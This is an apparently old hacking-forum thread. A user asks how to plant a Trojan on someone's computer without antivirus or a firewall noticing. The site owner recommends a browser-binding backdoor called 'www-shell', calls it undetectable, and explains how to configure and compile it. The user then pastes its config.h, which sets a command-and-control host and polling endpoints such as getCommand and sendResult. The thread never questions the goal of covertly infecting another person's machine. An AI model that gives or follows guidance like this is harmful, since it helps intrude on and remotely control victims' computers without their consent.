Firewall and Antivirus

For beginners, flames not allowed...(just by the staff :P)
Post Reply
User avatar
weedkiller
forum buddy
forum buddy
Posts: 24
Joined: 24 Jan 2006, 17:00
18

Firewall and Antivirus

Post by weedkiller »

OK how do i plant a Trojan in someones computer whitout there antivirus or firewall blocks it ??!!? :p

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Post by bad_brain »

almost impossible to say... :P
it depends on the firewall/virus scanner, Norton and F-Secure (I think) programs are running self-diagnosises, so it´s hard to disable these ones.
but I can recommend the good old www-shell, it binds to the browser, so it´s undetectable (if you not exactly know what you´re looking for)... :wink:

User avatar
weedkiller
forum buddy
forum buddy
Posts: 24
Joined: 24 Jan 2006, 17:00
18

Post by weedkiller »

how do you gett the wwwshell to work?! its youst strange files

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Post by bad_brain »

hehe...well, the good ones are not "clickable"... 8)
it´s all source code, you need to compile it after you´ve done the configuration... :wink:

User avatar
weedkiller
forum buddy
forum buddy
Posts: 24
Joined: 24 Jan 2006, 17:00
18

Post by weedkiller »

one last question how do you config??

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Post by bad_brain »

it´s really simple, open the config.h-files in notepad and take a look, comments are included.... :wink:

User avatar
weedkiller
forum buddy
forum buddy
Posts: 24
Joined: 24 Jan 2006, 17:00
18

Post by weedkiller »

sorry for asking so many questions but still dont realy understand how to compile it i downloaded the program it says in the Readme file


// this is the servers ip and port
#define HOST "http://192.168.0.23:8888/"

// amount of seconds between to getCommand requests
#define POLL_INTERVAL 1

// the maximum size of an URL
// The standard sets no limit. But maybe your browser does
#define MAX_URL_SIZE 400

/* normally you don't want to edit this */
#define POLL "getCommand"
#define RESPONSE "response?info="
#define RESULT "sendResult?data="
#define BEGIN "beginResult"
#define END "endResult"


#endif


what of this do you need to edite by the way????

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Post by bad_brain »

just the IP-adresses... :wink:

and for compiling check here:
http://www.thefreecountry.com/compilers/cpp.shtml

xtheblack9x
suck-o-fied!
suck-o-fied!
Posts: 99
Joined: 15 Jan 2006, 17:00
18
Location: USA

Post by xtheblack9x »

bad_brain wrote:just the IP-adresses... :wink:

and for compiling check here:
http://www.thefreecountry.com/compilers/cpp.shtml
so does this bind itself to all browsers? does it only open there computer when they have a browser open?

User avatar
weedkiller
forum buddy
forum buddy
Posts: 24
Joined: 24 Jan 2006, 17:00
18

Post by weedkiller »

ok i changed the ip and the thing now is whene you cimpile what is it you need to compile?! how do you make it work ?!!?

User avatar
Nerdz
The Architect
The Architect
Posts: 1127
Joined: 15 Jun 2005, 16:00
18
Location: #db_error in: select usr.location from sucko_member where usr.id=63;
Contact:

Post by Nerdz »

I have download it for fun, look in the readme file , they will tell you excatly where to get the compilator...

But i also read that it is for german windows or what?... And also... how do you unbind it after... bcz b4 playing with it I just wanna make sure ill be able to remove it from my network comps :wink:
Give a man a fish, you feed him for one day.
Learn a man to fish, you feed him for life.

User avatar
weedkiller
forum buddy
forum buddy
Posts: 24
Joined: 24 Jan 2006, 17:00
18

Post by weedkiller »

bah didnt se that about german computer :( and i hoped i could make it work :cry:

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Post by bad_brain »

oops...damn, you´re right, didn´t knew that, I have to edit the description... :oops: I´m using the german XP version, so I havn´t noticed it.
sorry about that.

User avatar
Nerdz
The Architect
The Architect
Posts: 1127
Joined: 15 Jun 2005, 16:00
18
Location: #db_error in: select usr.location from sucko_member where usr.id=63;
Contact:

Post by Nerdz »

Np... as long as we dont pay you can make as much mistake as you want :P
Give a man a fish, you feed him for one day.
Learn a man to fish, you feed him for life.

Post Reply